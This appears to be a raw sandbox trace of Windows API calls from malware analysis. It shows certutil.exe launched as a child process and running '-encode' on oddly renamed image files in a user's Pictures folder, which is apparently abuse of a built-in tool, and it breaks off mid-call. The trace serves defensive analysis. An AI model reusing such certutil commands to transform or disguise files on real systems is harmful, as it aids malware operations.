[0298.223] DispatchMessageW (lpMsg=0xb1e8c7f6f0) returned 0x0 [0298.223] LocalAlloc (uFlags=0x0, uBytes=0x7a) returned 0x21cfb9dce80 [0298.223] LocalAlloc (uFlags=0x0, uBytes=0x86) returned 0x21cfb9d4400 [0298.223] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="p", cchCount2=-1) returned 1 [0298.224] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="pin", cchCount2=-1) returned 1 [0298.224] SetLastError (dwErrCode=0x80070716) [0298.224] _vsnwprintf (in: _Buffer=0xb1e8c7f0f8, _BufferCount=0xb, _Format="%d", _ArgList=0xb1e8c7f0e8 | out: _Buffer="465") returned 3 [0298.224] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1d1, lpBuffer=0xb1e8c7eeb0, cchBufferMax=128 | out: lpBuffer="Command Line") returned 0xc [0298.224] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x21cfb9e4180 [0298.224] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0298.224] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0298.224] GetEnvironmentVariableW (in: lpName="certsrv_rawhex", lpBuffer=0xb1e8c7ee90, nSize=0x104 | out: lpBuffer="\x01") returned 0x0 [0298.224] GetLastError () returned 0xcb [0298.224] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0298.224] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0298.224] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0298.224] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0298.224] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0298.224] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0298.225] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0298.225] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0298.225] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0298.225] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0298.225] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0298.225] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0298.225] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0298.225] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0298.225] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0298.225] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0298.225] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0298.225] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0298.225] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0298.225] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0298.225] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0298.225] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Cryptography\\AutoEnrollment", ulOptions=0x0, samDesired=0x20019, phkResult=0xb1e8c7eb58 | out: phkResult=0xb1e8c7eb58*=0x23c) returned 0x0 [0298.225] LocalAlloc (uFlags=0x0, uBytes=0x5e) returned 0x21cfb9d8970 [0298.225] RegQueryValueExW (in: hKey=0x23c, lpValueName="RawHex", lpReserved=0x0, lpType=0xb1e8c7f0c8, lpData=0xb1e8c7f0f8, lpcbData=0xb1e8c7f0c0*=0x4 | out: lpType=0xb1e8c7f0c8*=0x0, lpData=0xb1e8c7f0f8*=0x0, lpcbData=0xb1e8c7f0c0*=0x4) returned 0x2 [0298.225] LocalFree (hMem=0x21cfb9d8970) returned 0x0 [0298.225] RegCloseKey (hKey=0x23c) returned 0x0 [0298.225] LocalFree (hMem=0x0) returned 0x0 [0298.225] CryptFindOIDInfo (dwKeyType=0x1, pvKey=0x7ff70ae80270, dwGroupId=0x7) returned 0x21cfb9fd470 [0298.236] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount1=-1, lpString2="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount2=-1) returned 2 [0298.237] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="stdio", cchCount2=-1) returned 1 [0298.237] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="LegacyCertSelectionUI", cchCount2=-1) returned 1 [0298.237] lstrcmpW (lpString1="encode", lpString2="uSAGE") returned -1 [0298.237] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="gp", cchCount2=-1) returned 1 [0298.237] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="loc", cchCount2=-1) returned 1 [0298.237] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="ent", cchCount2=-1) returned 1 [0298.237] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="q", cchCount2=-1) returned 1 [0298.237] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dump", cchCount2=-1) returned 3 [0298.237] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dumpPFX", cchCount2=-1) returned 3 [0298.237] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="asn", cchCount2=-1) returned 3 [0298.237] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="", cchCount2=-1) returned 3 [0298.237] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decodehex", cchCount2=-1) returned 3 [0298.237] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encodehex", cchCount2=-1) returned 1 [0298.237] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decode", cchCount2=-1) returned 3 [0298.237] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encode", cchCount2=-1) returned 2 [0298.237] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x21cfba00a40 [0298.237] GetComputerNameW (in: lpBuffer=0x21cfba00a40, nSize=0xb1e8c7f0c0 | out: lpBuffer="NQDPDE", nSize=0xb1e8c7f0c0) returned 1 [0298.238] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x0, nSize=0xb1e8c7f090 | out: lpBuffer=0x0, nSize=0xb1e8c7f090) returned 0 [0298.238] GetLastError () returned 0xea [0298.238] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x21cfb9eb6b0 [0298.238] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x21cfb9eb6b0, nSize=0xb1e8c7f090 | out: lpBuffer="NQdPdE", nSize=0xb1e8c7f090) returned 1 [0298.238] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0298.241] CertCreateCertificateContext (dwCertEncodingType=0x1, pbCertEncoded=0x21cfba01170, cbCertEncoded=0xa5c0) returned 0x0 [0298.244] CertCreateCRLContext (dwCertEncodingType=0x1, pbCrlEncoded=0x21cfba01170, cbCrlEncoded=0xa5c0) returned 0x0 [0298.244] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x4, pbEncoded=0x21cfba01170, cbEncoded=0xa5c0, dwFlags=0x8000, pDecodePara=0xb1e8c7ef70, pvStructInfo=0xb1e8c7f000, pcbStructInfo=0xb1e8c7eff4 | out: pvStructInfo=0xb1e8c7f000, pcbStructInfo=0xb1e8c7eff4) returned 0 [0298.244] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x15, pbEncoded=0x21cfba01170, cbEncoded=0xa5c0, dwFlags=0x8000, pDecodePara=0xb1e8c7ef70, pvStructInfo=0xb1e8c7f000, pcbStructInfo=0xb1e8c7eff4 | out: pvStructInfo=0xb1e8c7f000, pcbStructInfo=0xb1e8c7eff4) returned 0 [0298.245] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x3b, pbEncoded=0x21cfba01170, cbEncoded=0xa5c0, dwFlags=0x8000, pDecodePara=0xb1e8c7ef70, pvStructInfo=0xb1e8c7f000, pcbStructInfo=0xb1e8c7eff4 | out: pvStructInfo=0xb1e8c7f000, pcbStructInfo=0xb1e8c7eff4) returned 0 [0298.245] CryptMsgOpenToDecode (dwMsgEncodingType=0x10001, dwFlags=0x0, dwMsgType=0x0, hCryptProv=0x0, pRecipientInfo=0x0, pStreamInfo=0x0) returned 0x21cfb9e5580 [0298.252] CryptMsgUpdate (hCryptMsg=0x21cfb9e5580, pbData=0x21cfba01170, cbData=0xa5c0, fFinal=1) returned 0 [0298.252] GetLastError () returned 0x8009310b [0298.252] CryptMsgClose (hCryptMsg=0x21cfb9e5580) returned 1 [0298.252] GetFileAttributesExW (in: lpFileName="F0Gamc8uxcBiM.png.Sister" (normalized: "c:\\users\\fd1hvy\\pictures\\f0gamc8uxcbim.png.sister"), fInfoLevelId=0x0, lpFileInformation=0xb1e8c7f020 | out: lpFileInformation=0xb1e8c7f020*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf54a76c0, ftCreationTime.dwHighDateTime=0x1d5effd, ftLastAccessTime.dwLowDateTime=0x6e829c50, ftLastAccessTime.dwHighDateTime=0x1d5e59c, ftLastWriteTime.dwLowDateTime=0x6e829c50, ftLastWriteTime.dwHighDateTime=0x1d5e59c, nFileSizeHigh=0x0, nFileSizeLow=0xa5c0)) returned 1 [0298.252] _vsnwprintf (in: _Buffer=0xb1e8c7f028, _BufferCount=0xb, _Format="%d", _ArgList=0xb1e8c7f018 | out: _Buffer="359") returned 3 [0298.252] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x167, lpBuffer=0xb1e8c7ede0, cchBufferMax=128 | out: lpBuffer="Input Length = %d") returned 0x11 [0298.252] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x21cfba00e60 [0298.252] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0298.252] _vsnwprintf (in: _Buffer=0xb1e8c7e010, _BufferCount=0x1ff, _Format="Input Length = %d", _ArgList=0xb1e8c7f068 | out: _Buffer="Input Length = 42432") returned 20 [0298.252] GetFileType (hFile=0x50) returned 0x2 [0298.252] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xb1e8c7e010*, nNumberOfCharsToWrite=0x14, lpNumberOfCharsWritten=0xb1e8c7dfc4, lpReserved=0x0 | out: lpBuffer=0xb1e8c7e010*, lpNumberOfCharsWritten=0xb1e8c7dfc4*=0x14) returned 1 [0298.253] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0298.253] _vsnwprintf (in: _Buffer=0xb1e8c7e010, _BufferCount=0x1ff, _Format="\n", _ArgList=0xb1e8c7f068 | out: _Buffer="\n") returned 1 [0298.253] GetFileType (hFile=0x50) returned 0x2 [0298.254] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xb1e8c7e010*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0xb1e8c7dfc4, lpReserved=0x0 | out: lpBuffer=0xb1e8c7e010*, lpNumberOfCharsWritten=0xb1e8c7dfc4*=0x1) returned 1 [0298.269] GetFileAttributesExW (in: lpFileName="F0Gamc8uxcBiM.png.Cruel" (normalized: "c:\\users\\fd1hvy\\pictures\\f0gamc8uxcbim.png.cruel"), fInfoLevelId=0x0, lpFileInformation=0xb1e8c7f020 | out: lpFileInformation=0xb1e8c7f020*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc62ca3a, ftCreationTime.dwHighDateTime=0x1d6141f, ftLastAccessTime.dwLowDateTime=0xdc62ca3a, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xdc64045a, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0xe420)) returned 1 [0298.269] _vsnwprintf (in: _Buffer=0xb1e8c7f028, _BufferCount=0xb, _Format="%d", _ArgList=0xb1e8c7f018 | out: _Buffer="361") returned 3 [0298.269] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x169, lpBuffer=0xb1e8c7ede0, cchBufferMax=128 | out: lpBuffer="Output Length = %d") returned 0x12 [0298.269] LocalAlloc (uFlags=0x0, uBytes=0x26) returned 0x21cfba00f80 [0298.269] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0298.269] _vsnwprintf (in: _Buffer=0xb1e8c7e010, _BufferCount=0x1ff, _Format="Output Length = %d", _ArgList=0xb1e8c7f068 | out: _Buffer="Output Length = 58400") returned 21 [0298.269] GetFileType (hFile=0x50) returned 0x2 [0298.269] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xb1e8c7e010*, nNumberOfCharsToWrite=0x15, lpNumberOfCharsWritten=0xb1e8c7dfc4, lpReserved=0x0 | out: lpBuffer=0xb1e8c7e010*, lpNumberOfCharsWritten=0xb1e8c7dfc4*=0x15) returned 1 [0298.271] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0298.271] _vsnwprintf (in: _Buffer=0xb1e8c7e010, _BufferCount=0x1ff, _Format="\n", _ArgList=0xb1e8c7f068 | out: _Buffer="\n") returned 1 [0298.271] GetFileType (hFile=0x50) returned 0x2 [0298.271] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xb1e8c7e010*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0xb1e8c7dfc4, lpReserved=0x0 | out: lpBuffer=0xb1e8c7e010*, lpNumberOfCharsWritten=0xb1e8c7dfc4*=0x1) returned 1 [0298.279] LocalFree (hMem=0x21cfba01170) returned 0x0 [0298.280] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0298.280] _vsnwprintf (in: _Buffer=0xb1e8c7f088, _BufferCount=0xb, _Format="%d", _ArgList=0xb1e8c7f078 | out: _Buffer="2022") returned 4 [0298.280] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x7e6, lpBuffer=0xb1e8c7ee40, cchBufferMax=128 | out: lpBuffer="%ws: -%ws command completed successfully.") returned 0x29 [0298.280] LocalAlloc (uFlags=0x0, uBytes=0x54) returned 0x21cfb9d8f70 [0298.280] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0298.280] _vsnwprintf (in: _Buffer=0xb1e8c7e070, _BufferCount=0x1ff, _Format="%ws: -%ws command completed successfully.", _ArgList=0xb1e8c7f0c8 | out: _Buffer="CertUtil: -encode command completed successfully.") returned 49 [0298.280] GetFileType (hFile=0x50) returned 0x2 [0298.280] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xb1e8c7e070*, nNumberOfCharsToWrite=0x31, lpNumberOfCharsWritten=0xb1e8c7e024, lpReserved=0x0 | out: lpBuffer=0xb1e8c7e070*, lpNumberOfCharsWritten=0xb1e8c7e024*=0x31) returned 1 [0298.281] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0298.281] _vsnwprintf (in: _Buffer=0xb1e8c7e070, _BufferCount=0x1ff, _Format="\n", _ArgList=0xb1e8c7f0c8 | out: _Buffer="\n") returned 1 [0298.281] GetFileType (hFile=0x50) returned 0x2 [0298.281] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xb1e8c7e070*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0xb1e8c7e024, lpReserved=0x0 | out: lpBuffer=0xb1e8c7e070*, lpNumberOfCharsWritten=0xb1e8c7e024*=0x1) returned 1 [0298.285] LocalFree (hMem=0x0) returned 0x0 [0298.286] LocalFree (hMem=0x21cfb9d4400) returned 0x0 [0298.286] LocalFree (hMem=0x21cfb9dce80) returned 0x0 [0298.286] SetLastError (dwErrCode=0x80070716) [0298.286] _vsnwprintf (in: _Buffer=0xb1e8c7f0f8, _BufferCount=0xb, _Format="%d", _ArgList=0xb1e8c7f0e8 | out: _Buffer="511") returned 3 [0298.286] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1ff, lpBuffer=0xb1e8c7eeb0, cchBufferMax=128 | out: lpBuffer="Command Succeeded") returned 0x11 [0298.286] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x21cfba00ad0 [0298.286] PostQuitMessage (nExitCode=0) [0298.286] GetMessageW (in: lpMsg=0xb1e8c7f6f0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0xb1e8c7f6f0) returned 0 [0298.286] LocalFree (hMem=0x21cfb9eb6b0) returned 0x0 [0298.286] LocalFree (hMem=0x21cfba00a40) returned 0x0 [0298.286] LocalFree (hMem=0x0) returned 0x0 [0298.287] GetModuleHandleW (lpModuleName="certadm.dll") returned 0x0 [0298.287] GetLastError () returned 0x7e [0298.287] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0298.289] GetProcAddress (hModule=0x7ffcdebe0000, lpProcName="DllMain") returned 0x7ffcdebe1530 [0298.289] DllMain () returned 0x1 [0298.289] LocalFree (hMem=0x21cfb9eb350) returned 0x0 [0298.289] LocalFree (hMem=0x21cfb9e4180) returned 0x0 [0298.289] LocalFree (hMem=0x21cfba00e60) returned 0x0 [0298.289] LocalFree (hMem=0x21cfba00f80) returned 0x0 [0298.289] LocalFree (hMem=0x21cfb9d8f70) returned 0x0 [0298.289] LocalFree (hMem=0x21cfba00ad0) returned 0x0 [0298.289] LocalFree (hMem=0x21cfb9dba80) returned 0x0 [0298.289] LocalFree (hMem=0x21cfb9e4360) returned 0x0 [0298.290] GetModuleHandleW (lpModuleName="certenroll.dll") returned 0x0 [0298.290] GetLastError () returned 0x7e [0298.290] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0298.290] GetProcAddress (hModule=0x7ffcdebe0000, lpProcName="DllMain") returned 0x7ffcdebe1530 [0298.290] DllMain () returned 0x1 [0298.290] exit (_Code=0) Thread: id = 122 os_tid = 0x1338 Process: id = "48" image_name = "certutil.exe" filename = "c:\\windows\\system32\\certutil.exe" page_root = "0x16fd9000" os_pid = "0x13c8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x1190" cmd_line = "certutil -encode \"Gq9O pR9E.bmp.Sister\" \"Gq9O pR9E.bmp.Cruel\"" cur_dir = "C:\\Users\\FD1HVy\\Pictures\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 123 os_tid = 0x13cc [0298.684] GetStartupInfoW (in: lpStartupInfo=0x32deebfd20 | out: lpStartupInfo=0x32deebfd20*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"Gq9O pR9E.bmp.Sister\" \"Gq9O pR9E.bmp.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0298.685] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff70ad80000 [0298.685] __set_app_type (_Type=0x1) [0298.685] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff70ae6cd90) returned 0x0 [0298.686] __wgetmainargs (in: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8, _DoWildCard=0, _StartInfo=0x7ff70aed38b4 | out: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8) returned 0 [0298.687] _onexit (_Func=0x7ff70ae745a0) returned 0x7ff70ae745a0 [0298.690] _onexit (_Func=0x7ff70ae746c0) returned 0x7ff70ae746c0 [0298.690] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0298.691] GetProcAddress (hModule=0x7ffce9120000, lpProcName="WerSetFlags") returned 0x7ffce913a530 [0298.691] WerSetFlags () returned 0x0 [0298.691] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0298.691] __iob_func () returned 0x7ffcea2dea00 [0298.691] _fileno (_File=0x7ffcea2dea30) returned 1 [0298.691] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0298.691] _wsetlocale (category=1, locale=".OCP") returned="English_United States.437" [0298.693] _wsetlocale (category=3, locale=".OCP") returned="English_United States.437" [0298.693] _wsetlocale (category=4, locale=".OCP") returned="English_United States.437" [0298.693] _wsetlocale (category=5, locale=".OCP") returned="English_United States.437" [0298.693] GetConsoleOutputCP () returned 0x1b5 [0298.694] _vsnwprintf (in: _Buffer=0x32deebfc90, _BufferCount=0xb, _Format=".%d", _ArgList=0x32deebfbb8 | out: _Buffer=".437") returned 4 [0298.694] _wsetlocale (category=2, locale=".437") returned="English_United States.437" [0298.694] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0298.694] GetFileType (hFile=0x50) returned 0x2 [0298.694] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0298.694] GetProcAddress (hModule=0x7ffce9120000, lpProcName="SetThreadUILanguage") returned 0x7ffce913a990 [0298.695] SetThreadUILanguage (LangId=0x0) returned 0x409 [0298.695] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1=".exe", cchCount1=-1, lpString2=".exe", cchCount2=-1) returned 2 [0298.695] GetCommandLineW () returned="certutil -encode \"Gq9O pR9E.bmp.Sister\" \"Gq9O pR9E.bmp.Cruel\"" [0298.695] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x1f974bdb1f0 [0298.696] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x1f974bccb40 [0298.696] LocalFree (hMem=0x1f974bdb1f0) returned 0x0 [0298.696] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x1f974bcc310 [0298.696] LocalAlloc (uFlags=0x0, uBytes=0x22) returned 0x1f974bcc100 [0298.696] LocalFree (hMem=0x1f974bcc310) returned 0x0 [0298.696] LocalFree (hMem=0x1f974bccb40) returned 0x0 [0298.696] LocalFree (hMem=0x0) returned 0x0 [0298.696] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0298.696] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0298.697] GetCommandLineW () returned="certutil -encode \"Gq9O pR9E.bmp.Sister\" \"Gq9O pR9E.bmp.Cruel\"" [0298.697] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x1f974bdb2f0 [0298.697] GetSystemTime (in: lpSystemTime=0x32deebf980 | out: lpSystemTime=0x32deebf980*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x12, wMinute=0x32, wSecond=0xd, wMilliseconds=0xed)) [0298.697] SystemTimeToFileTime (in: lpSystemTime=0x32deebf980, lpFileTime=0x32deebf978 | out: lpFileTime=0x32deebf978) returned 1 [0298.697] FileTimeToLocalFileTime (in: lpFileTime=0x32deebf978, lpLocalFileTime=0x32deebf940 | out: lpLocalFileTime=0x32deebf940) returned 1 [0298.697] FileTimeToSystemTime (in: lpFileTime=0x32deebf940, lpSystemTime=0x32deebf6b0 | out: lpSystemTime=0x32deebf6b0) returned 1 [0298.697] GetDateFormatW (in: Locale=0x400, dwFlags=0x1, lpDate=0x32deebf6b0, lpFormat=0x0, lpDateStr=0x32deebf7c0, cchDate=128 | out: lpDateStr="4/16/2020") returned 10 [0298.697] GetTimeFormatW (in: Locale=0x400, dwFlags=0x2, lpTime=0x32deebf6b0, lpFormat=0x0, lpTimeStr=0x32deebf6c0, cchTime=128 | out: lpTimeStr="8:50 PM") returned 8 [0298.697] _vsnwprintf (in: _Buffer=0x32deebf6ce, _BufferCount=0x78, _Format=" %02u.%03us", _ArgList=0x32deebf698 | out: _Buffer=" 13.237s") returned 8 [0298.697] LocalAlloc (uFlags=0x0, uBytes=0x34) returned 0x1f974bddb80 [0298.697] SetLastError (dwErrCode=0x80070716) [0298.698] _vsnwprintf (in: _Buffer=0x32deebf748, _BufferCount=0xb, _Format="%d", _ArgList=0x32deebf738 | out: _Buffer="948") returned 3 [0298.698] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x3b4, lpBuffer=0x32deebf500, cchBufferMax=128 | out: lpBuffer="Begin") returned 0x5 [0298.698] LocalAlloc (uFlags=0x0, uBytes=0xc) returned 0x1f974bdb2b0 [0298.698] LocalAlloc (uFlags=0x0, uBytes=0x640) returned 0x1f974bd14b0 [0298.698] LocalFree (hMem=0x1f974bddb80) returned 0x0 [0298.698] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x32deebf9f0 | out: lpSystemTimeAsFileTime=0x32deebf9f0*(dwLowDateTime=0xdca5a003, dwHighDateTime=0x1d6141f)) [0298.698] GetLocalTime (in: lpSystemTime=0x32deebfa28 | out: lpSystemTime=0x32deebfa28*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x14, wMinute=0x32, wSecond=0xd, wMilliseconds=0xef)) [0298.698] SystemTimeToFileTime (in: lpSystemTime=0x32deebfa28, lpFileTime=0x32deebfa00 | out: lpFileTime=0x32deebfa00) returned 1 [0298.698] CompareFileTime (lpFileTime1=0x32deebfa00, lpFileTime2=0x32deebf9f0) returned 1 [0298.698] _vsnwprintf (in: _Buffer=0x32deebfa38, _BufferCount=0x13, _Format="GMT %s %.2f", _ArgList=0x32deebf9c8 | out: _Buffer="GMT + 2.00") returned 10 [0298.699] LocalFree (hMem=0x1f974bdb2f0) returned 0x0 [0298.699] GetModuleHandleW (lpModuleName="certca.dll") returned 0x7ffcde670000 [0298.699] FindResourceW (hModule=0x7ffcde670000, lpName=0x1, lpType=0x10) returned 0x7ffcde730090 [0298.699] LoadResource (hModule=0x7ffcde670000, hResInfo=0x7ffcde730090) returned 0x7ffcde7300b0 [0298.699] LockResource (hResData=0x7ffcde7300b0) returned 0x7ffcde7300b0 [0298.699] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="VS_VERSION_INFO", cchCount1=-1, lpString2="VS_VERSION_INFO", cchCount2=-1) returned 2 [0298.699] _vsnwprintf (in: _Buffer=0x7ff70aed6890, _BufferCount=0x3f, _Format="%u.%u.%u.%u", _ArgList=0x32deebfa68 | out: _Buffer="10.0.15063.447") returned 14 [0298.699] GetACP () returned 0x4e4 [0298.699] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0298.699] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x1f974bdb490 [0298.699] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x1f974bdb490, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0298.699] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x1f974bdd780 [0298.699] _vsnwprintf (in: _Buffer=0x1f974bdd780, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0x32deebfab8 | out: _Buffer="10.0.15063.447 retail") returned 21 [0298.699] LocalFree (hMem=0x1f974bdb490) returned 0x0 [0298.699] LocalFree (hMem=0x0) returned 0x0 [0298.700] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0298.700] GetACP () returned 0x4e4 [0298.700] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0298.700] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x1f974bdaf90 [0298.700] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, 